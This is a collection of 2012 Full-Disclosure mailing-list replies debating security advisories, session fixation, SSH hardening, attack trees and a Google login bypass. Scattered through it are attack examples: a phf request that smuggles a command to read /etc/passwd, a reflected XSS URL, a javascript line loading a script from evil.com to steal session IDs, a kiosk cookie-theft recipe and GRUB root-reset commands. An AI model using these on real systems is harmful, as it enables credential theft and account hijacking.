1.) waste of a reference by no follow through :( shame shame 2.) The only real problem with that idea is that you'd be doing it wrong. As in what you are doing does not accomplish what you want it to do. Those polymorphic techniques are there to prevent identification, not necessarily to prevent hooking, code injection, and reverse engineering. You use completely different techniques for those. 3.) It wouldn't be hard to get around it. Just replace a dll or two with the functions you want to intercept and analyze the output. They couldn't care less how polymorphic your code is if it still needs to pass the juicy data to a library function. And in a lot of cases they are already doing this, so its highly possible that you could suddenly take an application a piece of malware was designed to harvest information from, make it all polymorphic, and the same old malware version could still mess with it. And yes, it would still he able to identify the application cause the end user needs to be able to identify it and the malware would just use whatever method the end user would to spot it for injection or what not. 3.) I will say, at least you're thinking, even if its flawed. On Jul 19, 2012 6:24 PM, Glenn and Mary Everhart everh...@gce.com wrote: Hello, FD... A thought occurred to me: Why not use the same kind of polymorphism and software metamorphism that is used by malware writers as a protective measure? If you have a piece of code that you don't want malware to be able to inspect, that might perhaps have some secrets in it or that you want not to be trivial to have some other code patch, why not arrange for that code to be different in form (but the same in function) with every copy? (For places that insist on code that must be signed, you might need to have only perhaps scores or hundreds of variants, and then make it clear that the signed code requirements were making the systems that have them LESS secure than those without. bwahahaha. grin.) There are many ways to achieve this kind of result. Many would result in somewhat larger executables or the like, or possibly larger data, but some of the methods don't even need access to source code. (I would suspect many systems like this will be clearest to those of us who have worked in assembly languages and the like over the years, but that is a bit beside the point.) If every copy of a program is laid out differently, and data gets moved around also from copy to copy, the job of the attacker would seem to get much harder. Glenn Everhart ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin
Hello Full Disclosure! I is warn you about musntlive! He is use old joke over over again. Not funny! -- I actually got nothing against you personally but its boring when you use the same tactic over and over :/ mix things up and make it interesting! On Jul 17, 2012 8:24 AM, Григорий Братислава musntl...@gmail.com wrote: On Tue, Jul 17, 2012 at 10:11 AM, king cope isowarez.isowarez.isowa...@googlemail.com wrote: Hello Jan, I did some additional tests for the IIS bugs. * IIS 6.0 PHP authentication bypass is only possible on Windows Server 2003 SP1. SP2 seems unaffected So take that bug as resolved, my mistake as I didn't have a fully patched system online when testing. kingcope are we is release advisories to patched software? Is so, then I introduce exploit along with you. Hello full disclosure!! !! !! Is like to warn you about phf vulnerability. Is hackers can get your password list in is unpatched server. PoC on is my system: 213.24.76.77 - - [17/July/2012:23:17:47 -0700] GET /cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0 500 - In Ruby (here we is own rsnake): require 'open-uri' open(' http://www.webfringe.org/cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0'){ |f| print f.read } ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin
/*PoC*/ Sorry no automated code yet :( can verify manually as follows: Read musntlive's post. If it is similar to multiple previous posts check if still funny. Notice how you get a return value of nope. /EoF I can haz CVE now :(? On Jul 17, 2012 10:10 AM, Григорий Братислава musntl...@gmail.com wrote: And you can is prove this theory is how? On Tue, Jul 17, 2012 at 1:09 PM, Gage Bystrom themadichi...@gmail.com wrote: Hello Full Disclosure! I is warn you about musntlive! He is use old joke over over again. Not funny! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability
Ok after playing around and re-reading the advisory I was finally able to get the PoC to work. While it is interesting once your actually see it work I simply do not believe it warrants the severity you have described. The man reason why I say this is because any attacker in a position to modify a victim's session id is simply in a position to do better things. Why go through the niche roundabout way when you can just simply jack the authenticated session ID? The only conceivable scenario I can think of would be in the case of a stored XSS that isn't present after authentication, in which case stealing the session ID before hand would be a much better avenue and more in line with what you are trying to warn about(maybe you should make the PoC reflect that to better illustrate your point). Even then we are talking about a really niche attack. Basically this sounds like a classic example of: Yes, technically this is abusable, but if you are worried about this, you have bigger problems to deal with. Speaking of xss your vuln page has one: http://www.iosec.org/iosec_login_vulnerable.php?user=%3Cscript%3Ealert%28%22Told%20ya%20so%22%29%3C/script%3Efailed=1 not to mention an arbitrary(even non-existent users) account change: http://www.iosec.org/iosec_login_vulnerable.php?user=admin ((after logging in, not that the result page is much)) Yeah, yeah I know it's meant to be vulnerable to begin with, but you should really make sure a PoC vulnerable page is only vulnerable to what you are trying to demonstrate, otherwise it can be hard to identify if this is a serious issue or just an example of your personal screw ups, generally speaking at least. On Fri, Jul 13, 2012 at 1:46 AM, Gokhan Muharremoglu gokhan.muharremo...@iosec.org wrote: You can find an example page and combined vulnerabilities below URL. This example login page is affected by Predefined Post Authentication Session ID Vulnerability. This vulnerability can lead a social engineering scenario or other hijacking attack scenarios when mixed with other vulnerabilities (such XSS). For proof of concept: http://www.iosec.org/iosec_login_vulnerable.php Predefined Post Authentication Session ID Vulnerability is a Vendor-neutral vulnerability and it let attackers to design new attack scenarios. A lot of web application on the Internet affected by this vulnerability. --- Vulnerability Name: Predefined Post Authentication Session ID Vulnerability Type: Improper Session Handling Impact: Session Hijacking Level: Medium Date: 10.07.2012 Vendor: Vendor-neutral Issuer: Gokhan Muharremoglu E-mail: gokhan.muharremo...@iosec.org VULNERABILITY If a web application starts a session and defines a session id before a user authenticated, this session id must be changed after a successful authentication. If web application uses the same session id before and after authentication, any legitimate user who has gained the before authentication session id can hijack future after authentication sessions too. MITIGATION To avoid this vulnerability, sessions must be regenerated after a successful login. In a session fixation attack, attacker fixates (sets) another person's (victim's) session identifier because of never regenerated and validated session id and this vulnerability can also lead to the Session Fixation attack or etc. Gokhan Muharremoglu Information Security Specialist (CEH, ECSA, CIW-Web Security Professional, Security+, EXIN 27002 ISFS) -Original Message- From: Jann Horn [mailto:jannh...@googlemail.com] Sent: Friday, July 13, 2012 2:06 AM To: Gokhan Muharremoglu Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability On Wed, Jul 11, 2012 at 11:34:11AM +0300, Gokhan Muharremoglu wrote: Vulnerability Name: Predefined Post Authentication Session ID Vulnerability Type: Improper Session Handling Impact: Session Hijacking Level: Medium Date: 10.07.2012 Vendor: Vendor-neutral Issuer: Gokhan Muharremoglu E-mail: gokhan.muharremo...@iosec.org VULNERABILITY If a web application starts a session and defines a session id before a user authenticated, this session id must be changed after a successful authentication. If web application uses the same session id before and after authentication, any legitimate user who has gained the before authentication session id can hijack future after authentication sessions too. Uh, so, erm, you assume that someone can steal my cookie/set it/whatever although the Same Origin Policy should clearly not allow that, and then, after I have logged in, he can't just steal my cookie? Unless you allow setting the session-ID via an URL or so (which would IMO be pretty stupid), I can't see how this is a realistic, vendor-neutral attack. Could you explain this a bit better? I don't get it. ___ Full-Disclosure - We believe in it.
Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability
Exactly, a niche scenario. I never said it /wasn't/ a vulnerability, only that it doesn't warrant the severity you claim. Also again, a situation where there are better things for an attack to do. Yes you could do that to grab the session id, or whats stopping you from writing javascript;document.write('script type=text/javascript src=www.evil.com/evil.js/script)? Presumably evil.js doing all sorts of nasty such as grabbing the session id and storing it remotely. Yes I'm aware you claimed policies are in place, but I'm curious if that approach was tried. Or better yet, why not just load an iframe of the site's app itself? Theres all sorts of known nasties you can do with iframes, why not intercept all the the requests to the iframe(wiping out the main page with more js so things are transparent) and then store the stolen values of logins to a cookie? Screw the session id, you can get full logins that way. All you would need to do is swing by and do your javascript;alert(document.cookie); to fetch the results. Also I'm no expert in javascript or heck even in web applications. That was just my first idea from a very basic knowledge, therefore we can assume that any remotely dedicated attacker can probably come up with an even cleaner solution, but the point still stands: If you are worried about this vulnerability, you have bigger issues, ergo why are you even worried? To me it'd be a lot like worrying if you are salting your passwords stored in a database properly when you are only xoring them. Yeah sure good salts are important to consider in isolation, but in that case you have bigger fish to fry. In this situation the bigger fish to fry is 'the attacker can run arbitrary js on the victim's side'. As to the xss, that just illustrates my smaller point that your PoC is extremely vague. I only figured it out while I was typing my original email, and that was going off my own testing and ignoring your instructions which were only misleading me. Judging by some of the other responses here, I'd be hesitant to say I was the only one. Might wanna think about whats the common denominator here. On Fri, Jul 13, 2012 at 4:23 AM, Gokhan Muharremoglu gokhan.muharremo...@iosec.org wrote: Ok. It seems i have to explain this vulnerability's effects with another scenario. This is a real life scenario and i wrote it in a Turkish article for National Information Security Portal which is run by TUBITAK. Article in Turkish with scenario = http://www.iosec.org/oturum_oncesi_tanimli_cerez.pdf I will explain it in English now. There are KIOSK/Terminal machines at bank branches in Turkey. Customers can reach to the regular Internet banking applicaton from here. But these machines are restricted with policies and you can not view any other web site or close browser page. But you can type in to the address bar. All you can do is to enter bank's internet web application. Here is the scenario (taken from real life): 1. Type javascript:alert(document.cookie) to the address bar and copy all information including Session ID. 2. Wait for a victim who logs in to the KIOSK. 3. After he/she logins, use your copied Session ID to login as him/her. In this scenario; There was no same-origin restrction, There was no httpOnly cookie tag. Always remember A chain is only as strong as its weakest link. This is a vulnerability, it's attacker's and conditions' decision how to use it. You can use wider vision to consider about real life scenarios. Gokhan Muharremoglu -Original Message- From: Gage Bystrom [mailto:themadichi...@gmail.com] Sent: Friday, July 13, 2012 1:40 PM To: Gokhan Muharremoglu; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability Ok after playing around and re-reading the advisory I was finally able to get the PoC to work. While it is interesting once your actually see it work I simply do not believe it warrants the severity you have described. The man reason why I say this is because any attacker in a position to modify a victim's session id is simply in a position to do better things. Why go through the niche roundabout way when you can just simply jack the authenticated session ID? The only conceivable scenario I can think of would be in the case of a stored XSS that isn't present after authentication, in which case stealing the session ID before hand would be a much better avenue and more in line with what you are trying to warn about(maybe you should make the PoC reflect that to better illustrate your point). Even then we are talking about a really niche attack. Basically this sounds like a classic example of: Yes, technically this is abusable, but if you are worried about this, you have bigger problems to deal with. Speaking of xss your vuln page has one: http://www.iosec.org/iosec_login_vulnerable.php?user=%3Cscript%3Ealert%28%22 Told%20ya%20so%22%29%3C/script%3Efailed=1
Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability
See now this is something I can get behind, as that's a scenario where this attack can achieve something that arbitary js normally could not do, or at least I'm more uncertain if other methods would work in that situation, and its a situation that is going to be reasonably common and not some super niche scenario. So thanks. As for OP, its sad if you don't care about the context of a vulnerability at all, but if that's your choice then fine but its gunna be your loss in the long run. On Jul 13, 2012 9:07 AM, Tim tim-secur...@sentinelchicken.org wrote: I have not read the PoC. Nor do I care to. However, I do want to point out one aspect of session fixation that I think many people overlook, as I think has been indicated by some responses on this thread. If this is not news to many of you, I appologize. Just trying to raise awareness. Suppose an application runs solely over HTTPS and assigns cookies with the secure flag. However, user sessions are assigned before login and they don't refresh their session cookies upon user login. In this case, users are still vulnerable to MitM: 1. An attacker gains access to view and modify unencrypted traffic between a user and the application. 2. The attacker accesses the site (in this case: https://example.com/) as an unauthenticated user and obtains a session cookie. 3. A victim's browser, at some point before the victim logs in to the application, makes a request to any non-HTTPS web page. (This could include web mail sites, search engines, etc) Let's call this site third-party.example.org for the sake of argument. 4. Attacker injects into a HTTP response (coming from third-party.example.org) which causes the victim's browser to request some page under the non-SSL version of example.com. This could happen through a redirect, injection of an image tag, or any number of other things. Anything to force the victim's browser to send one request to the HTTP version of example.com is sufficient. 5. Upon attempting to access the HTTP version of the vulnerable application (which of course doesn't exist), the attacker again intercepts this and replaces the HTTP response. In this response, a Set-Cookie header is included which provides the victim's browser with the application session that the attacker retrieved in step 2. 6. Later, the victim logs into the application normally. Even though the session cookie was assigned over a faux HTTP version of the site without the secure flag set, the victim's browser sends it along to the HTTPS site without knowing the difference. The site can't tell the cookie was set insecurely. 7. Since the attacker knows the session cookie, the account can be easily hijacked once the victim establishes an authenticated session with it. This is complicated, but it's not that much more complicated than what existing MitM tools, such as sslstrip, already do. Note that another variant of this attack is possible if the victim's browser silently accepts third-party cookies (which most do by default) and is able to convince a user to visit any malicious site. In this case, no MitM is necessary. Using HTTP cookies for session authentication is, and always has been, a bad idea. They are simply not designed for this application. We need something better. tim ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability
Well if I understand Tim correctly you wouldn't need a CA. In the attack he mentioned not once do you ever actually look at the ssl content. He's talking about redirecting them to plain http and then setting the session cookie and redirecting them back. Then when the victim logs on over ssl, the session cookie isn't changed and is treated as authenticated. Obviously since you set the cookie, you know what it is and can then impersonate them. I also agree that it probably wouldn't take too much effort to make that work, anything that can modify traffic ought to do the job easily enough with some tweaking. If not it wouldn't take much effort to whip up something specialized. On Jul 13, 2012 11:15 AM, Douglas Huff m...@jrbobdobbs.org wrote: On Jul 13, 2012, at 11:07, Tim tim-secur...@sentinelchicken.org wrote: This is complicated, but it's not that much more complicated than what existing MitM tools, such as sslstrip, already do. Better. I'm fairly certain this entire attack could be automated/orchestrated with mitmproxy with close to zero code changes. Only hard part is the procurement of a ca that will work on the target or finding some behind the firewall app to target that already uses a self-signed/invalid cert the users are used to clicking through. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Please remove my e-mail and IP from internet
Not to mention as others pointed out it is implied that the guy might've let out information he didn't have permission to let out, which could get him into some serious trouble. Also I could be wrong since I don't remember the full thing but did the guy said they were doing a pentest soon? No need to report the guy when any remotely competent pentest team is gunna find this and probably start laughing :) On Jul 3, 2012 8:18 AM, Jacqui Caren jacqui.ca...@ntlworld.com wrote: On 29/06/2012 06:47, Tonu Samuel wrote: Really funny thread is going on in Postfix-Users list. Scroll down about half of content here: http://comments.gmane.org/gmane.mail.postfix.user/227441 Just good example how NOT to do. I fwd'd details to lester haines of vulture central fame but doubt he will see it a a story. This outsourced orange sysadmin really needs the striesand effect to hit him and orange - hard! Has anyone contacted any of the email addresses in the logs pointing out the disclosure. I suspect kia as a company may not be too happy that a SAP reports email address has been disclosed. Far easier to soclially engineer something when you have even this minor sort of info. Jacqui ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] WordPress Authenticated File Upload Authorisation Bypass
to me it seems like hes trying to say that someone with administrative access has the ability tohave administrative access. Its like saying Hey guys! I found a local exploit and all it requires is to be a root user!!! I'm not sure if he's trolling or just stupid. On Thu, Jun 21, 2012 at 7:42 AM, Greg Knaddison greg.knaddi...@acquia.com wrote: On Wed, Jun 20, 2012 at 8:04 PM, Denis Andzakovic denis.andzako...@security-assessment.com wrote: Exploitation of this vulnerability requires a malicious user with access to the admin panel to use the /wp-admin/plugin-install.php?tab=upload page to upload a malicious file. That tool is meant to allow an admin to upload arbitrary php plugins. You can argue that this feature is insecure by design, but there are two solutions from the WordPress perspective: 1) Don't grant malicious users the permission to install plugins. 2) If you don't want this feature on your site at all, this feature can be disabled in the config define( 'DISALLOW_FILE_MODS', TRUE); By the way, two more vulnerabilities the theme installer has this same issue and the upgrade tool could also be abused if you can poison the DNS of the server. Regards, Greg ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] server security
Well thats a bit of an iffy one. I'd say it IS a security measure, albeit one that is solely effective if and only if compounded with other measures. It's unlikely, but you never know, you just might miss out on a nasty worm all because you werent running on a default port one day. On Thu, Jun 21, 2012 at 8:52 AM, Rob sy...@synfulvisions.com wrote: We need to make a distinction between security and obscurity here. The only time changing ports actually hardens a service in any way is when the port requires elevated rights to bind, changing to 1025 for example removes the root requirement. Any actual or theoretical vulnerabilities still exist. If somebody is looking at your server, they'll find the port without much trouble. Alternate ports can remove junk traffic from logs, so there is a benefit, if not entirely a security one. Rob Sent on the Sprint® Now Network from my BlackBerry® -Original Message- From: Alex Dolan dolan.a...@gmail.com Sender: listbou...@securityfocus.com Date: Thu, 21 Jun 2012 07:44:57 To: Littlefield, Tylerty...@tysdomain.com Cc: security-bas...@securityfocus.com Subject: Re: server security One tip I have is to set SSH to a port other than 22, I don't need to tell anyone how devastating it is if someone did actually get access to that service. Putting it on some other port reduces your risk On Thu, Jun 21, 2012 at 1:27 AM, Littlefield, Tyler ty...@tysdomain.com wrote: Hello: I have a couple questions. First, I'll explain what I did: I set up iptables and removed all unwanted services. Iptables blocks everything, then only opens what it wants. I also use the addrtype module to limit broadcast and unspec addresses, etc. I also do some malformed packet work where I just drop everything that looks malformed (mainly by the flags). 2) I secured ssh: blocked root logins, set it up so only users in the sshusers group can connect, and set it only to allow ppk. 3) I installed aid. 4) disabled malformed packets and forwarding/etc in sysctl. This is a basic web server that runs email, web and a couple other things. It's only running on a linode512, so I don't have the ability to set up a ton of stuff; I also think that would make things more of a mess. What else would be recommended? Also, I'm looking to add something to the web server; sometimes I notice that there are a lot of requests from people scanning for common urls like wordpress/phpbb3/etc, what kind of preventative measures exist for this? -- Take care, Ty http://tds-solutions.net The aspen project: a barebones light-weight mud engine: http://code.google.com/p/aspenmud He that will not reason is a bigot; he that cannot reason is a fool; he that dares not reason is a slave. Securing Apache Web Server with thawte Digital Certificate In this guide we examine the importance of Apache-SSL and who needs an SSL certificate. We look at how SSL works, how it benefits your company and how your customers can tell if a site is secure. You will find out how to test, purchase, install and use a thawte Digital Certificate on your Apache web server. Throughout, best practices for set-up are highlighted to help you ensure efficient ongoing management of your encryption keys and digital certificates. http://www.dinclinx.com/Redirect.aspx?36;4175;25;1371;0;5;946;e13b6be442f727d1 Securing Apache Web Server with thawte Digital Certificate In this guide we examine the importance of Apache-SSL and who needs an SSL certificate. We look at how SSL works, how it benefits your company and how your customers can tell if a site is secure. You will find out how to test, purchase, install and use a thawte Digital Certificate on your Apache web server. Throughout, best practices for set-up are highlighted to help you ensure efficient ongoing management of your encryption keys and digital certificates. http://www.dinclinx.com/Redirect.aspx?36;4175;25;1371;0;5;946;e13b6be442f727d1 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Info about attack trees
Never read any of his pieces on attack trees. That being said, and having read over it, I believe it to be infeasible to make an attack tree against any modern system, even with only the scope of web applications. There are simply a vast majority of possible start points, and what leafs that may exist all depend on what information you gather. As in, while building an attack tree you might have to add leaves as you attack the application. Such a final attack tree would be amazingly complex. If OP wants to go for that then that's his choice, but to be frank I believe there are more productive uses of someone's time. On Mon, May 28, 2012 at 7:20 AM, Peter Dawson slash...@gmail.com wrote: == there are no such thing as an attack tree. Eh ?? Seems that Schneier was blowing smoke up in the air with his thoughts on attack trees !! Anyhoot, here's another good old linky Military Operations Research V10, N2, 2005, http://www.innovativedecisions.com/documents/Buckshaw-Parnelletal.pdf /pd On Fri, May 25, 2012 at 9:46 AM, Daniel Hadfield d...@pingsweep.co.uk wrote: You can create an XSS with a SQLi If you can output on the page, you can inject HTML/JS with that variable On 25/05/2012 09:58, Federico De Meo wrote: Hello everybody, I'm new to this maling-list and to security in general. I'm here to learn and I'm starting with a question :) I'm looking for some informations about attack trees usage in web application analysis. For my master thesis I decided to study the usage of this formalism in order to reppresent attacks to a web applications. I need a lot of use cases from which to start learning common attacks which can help building a proper tree. From where can I start? I've already read the OWASP top 10 vulnerabilities an I'm familiar with XSS, SQLi, ecc. however I've no clue on how to combine them together in order to perform the steps needed to attack a system. I'm looking for some examples and maybe to some famous attacks from which I can understand which steps are performed and how commons vulnerabilities can being combined together. Any help is really appreciated. --- Federico. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Info about attack trees
If you havnt guessed from the replies, there are no such thing as an attack tree. Sure things maybe methodical, but I don't think of things as being like a tree. The classical method is something along the lines of preform recon, enumerate, attack, presist/extract data. You react based upon the information you gather, the more information you have, the clearer it is on to what the next step ought to be. No offense, but I don't think it'd be a good idea to make a master thesis about the textbook methodology of a field you are not familiar with, especially since you seem to be diving into it with multiple misconceptions and assumptions. On May 25, 2012 5:51 AM, Federico De Meo ade...@gmail.com wrote: Hello everybody, I'm new to this maling-list and to security in general. I'm here to learn and I'm starting with a question :) I'm looking for some informations about attack trees usage in web application analysis. For my master thesis I decided to study the usage of this formalism in order to reppresent attacks to a web applications. I need a lot of use cases from which to start learning common attacks which can help building a proper tree. From where can I start? I've already read the OWASP top 10 vulnerabilities an I'm familiar with XSS, SQLi, ecc. however I've no clue on how to combine them together in order to perform the steps needed to attack a system. I'm looking for some examples and maybe to some famous attacks from which I can understand which steps are performed and how commons vulnerabilities can being combined together. Any help is really appreciated. --- Federico. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google Accounts Security Vulnerability
I think what he was trying to say, and I'm not sure since I havnt tested it, is that you can bypass the 2nd layer of authentication by logging into IMAP. Cause normally if you try to login from a strange device Google becomes highly suspicious and starts asking you questions(the 2nd layer) and he's saying that if you have the first layer covered, you can use IMAP to avoid the second. I don't know for sure, I just think that's what he is trying to say On May 16, 2012 1:51 AM, Jason Hellenthal jhellent...@dataix.net wrote: On Tue, May 15, 2012 at 06:29:03PM -0700, Michael J. Gray wrote: I’ll clarify a bit. If you log on to your Google account from the website and it prompts you for additional security questions, you can circumvent this by simply checking mail via POP or what have you and then it adds your IP address to the list of recognized addresses. I don't know about anyone else, but I use two step verification with specific application pass phrases that Google so graciously allows you to do. With that said... It is the two phase authentication I chose to turn on due to the fact I have to access my mail through IMAPS. One thing I think you may be entirely confused with is the Allow multiple logins feature that you can turn off and achieve exactly what you would expect to happen. ? What I don't understand is... You go to your web portal to reset your password... you do not know what your password is...! how on earth would you login to IMAP, POP whatever...! ? ? PS: Besides if someone was able to login to your IMAP I sincerely doubt accessing your mail by the web will be on any one of the objective lists. They already have your =INBOX... Do use two phase authentication and do use application specific passwords for accessing your account. From: Thor (Hammer of God) [mailto:t...@hammerofgod.com] Sent: Tuesday, May 15, 2012 12:33 PM To: Mateus Felipe Tymburibá Ferreira Cc: Jason Hellenthal; Michael J. Gray; full-disclosure@lists.grok.org.uk Subject: RE: [Full-disclosure] Google Accounts Security Vulnerability Logging on to IMAP mail as one would be doing hundreds of times per day is not going to reset the web cookie. If that is what the OP is reporting, I would have to question if his recollection is correct since, by that logic, the password reset feature would never be activated since any other IMAP logon would clear it. If the user logged in, and was presented with the questions as stated, then it probably cleared any requirement since he would have to accept that. Unless he is saying that when presented with the questions he purposefully did not put them in and tried to logon to IMAP which I find odd. Regardless, if you already know the username and password for the email, it doesn’t matter anyway no does it? You could always get the mail via IMAP or POP or whatever options were configured in gmail. There wouldn’t be any need to go to the web interface in the first place. Now that I know I’m not missing anything, I’ll just let this one die on the vine. Description: Description: Description: Description: Description: Description: Description: Description: Description: TimSig Timothy “Thor” Mullen www.hammerofgod.com Thor http://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/15974957 27 ’s Microsoft Security Bible From: Mateus Felipe Tymburibá Ferreira [mailto:mateusty...@gmail.com] Sent: Tuesday, May 15, 2012 12:21 PM To: Thor (Hammer of God) Cc: Jason Hellenthal; Michael J. Gray; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Google Accounts Security Vulnerability I'm just copying the original message's part that probably answer your question (I did not test it...): From there, I attempted to log-in to my Google account with the same username and password. To my surprise, I was not presented with any questions to confirm my identity. This completes the steps required to bypass this account hijacking counter-measure. Mateus Felipe Tymburibá Ferreira, M. Sc. student at UFAM http://portal.ufam.edu.br CISSP https://www.isc2.org/cissp/default.aspx , OSCP http://www.offensive-security.com/information-security-certifications/oscp- offensive-security-certified-professional/ , OSCE http://www.offensive-security.com/information-security-certifications/osce- offensive-security-certified-expert/ , OSWP http://www.offensive-security.com/information-security-certifications/oswp- offensive-security-wireless-professional/ https://www.isc2.org/cissp/default.aspx http://www.offensive-security.com/information-security-certifications/oscp- offensive-security-certified-professional/
Re: [Full-disclosure] [OT] New online service to make XSSs easier
Anyone visiting a compromised site can get the hash, meaning anyone who is looking for it can find it and lets any random person(assuming stored) visiting to be able to grab all the cookie values. That's not even my personal concern. My concern is why should I trust the owner? Whether you are a black hat, white hat, or myriad of other assorted hats you would be allowing sensitive information to sit on this guy's server. How do we know he isn't silently making a copy of all the data for his own ends? Simply we don't. On Mon, May 7, 2012 at 6:03 AM, valdis.kletni...@vt.edu wrote: On Mon, 07 May 2012 02:27:33 +0530, karniv0re said: And this is anonymous.. How?? Haven't checked, but if you set up the userid/password via Tor, should be pretty anonymous. http://www.getmycookie.com/view.m3?hash=insert_hash_here And you get somebody else's hash value, how? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability in Backtrack
*sigh* vulnerability reports like this make me sad. On Apr 24, 2012 5:50 AM, Григорий Братислава musntl...@gmail.com wrote: Is good evening. I is would like to warn you about is vulnerability in Backtrack is all version. Backtrack Linux is penetration tester is system. Is come complete with tool for to make hacking for penetration tester. In is booting Backtrack, vulnerability exist in booting for when start if attacker is edit grub, attacker can bypass restricted user and is boot into admin account. E.g.: grub edit kernel /boom/vmlinuz-2.3.11.7 root=/dev/sda1 ro Single [ENTER] grub edit b # mount -t proc proc /proc # mount -o remount,rw / # passwd [ENTER IS ANYTHING YOU WANT] # sync # reboot I is will make this into video for bypassing security in Backtrack for to post on InfoSecInstitute -- `Wherever I is go - there am I routed` ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability in Backtrack
Next thing ya know he will publish a disclosure on the default password being toor. On Apr 24, 2012 7:41 AM, Urlan urlanc...@gmail.com wrote: It makes me laugh! hahahaha 2012/4/24 Gage Bystrom themadichi...@gmail.com *sigh* vulnerability reports like this make me sad. On Apr 24, 2012 5:50 AM, Григорий Братислава musntl...@gmail.com wrote: Is good evening. I is would like to warn you about is vulnerability in Backtrack is all version. Backtrack Linux is penetration tester is system. Is come complete with tool for to make hacking for penetration tester. In is booting Backtrack, vulnerability exist in booting for when start if attacker is edit grub, attacker can bypass restricted user and is boot into admin account. E.g.: grub edit kernel /boom/vmlinuz-2.3.11.7 root=/dev/sda1 ro Single [ENTER] grub edit b # mount -t proc proc /proc # mount -o remount,rw / # passwd [ENTER IS ANYTHING YOU WANT] # sync # reboot I is will make this into video for bypassing security in Backtrack for to post on InfoSecInstitute -- `Wherever I is go - there am I routed` ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] nullsec-bypass-aslr.pdf - ASLR / ASLR bypass techniques
Eh, nothing really exciting or noteworthy in it. Could serve as a good overview, but there are better techniques actively being used that solves multiple other problems as well(ROP comes to mind, although not always). On Sun, Apr 15, 2012 at 11:01 AM, Levent Kayan levonka...@gmx.net wrote: a salam alaikum list, a nice written paper by TheXero, who wants to share y0u: A paper discussing ASLR (Address Space Layout Randomization) and techniques to evade the protection you can find the paper at: http://www.nullsecurity.net/papers.html cheers, noobtrix -- Name: Levon 'noptrix' Kayan E-Mail: nopt...@nullsecurity.net GPG key: 0x014652c0 Key fingerprint: ABEF 4B4B 5D93 32B8 D423 A623 823D 4162 0146 52C0 Homepage: http://www.nullsecurity.net/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] keeping data safe offline
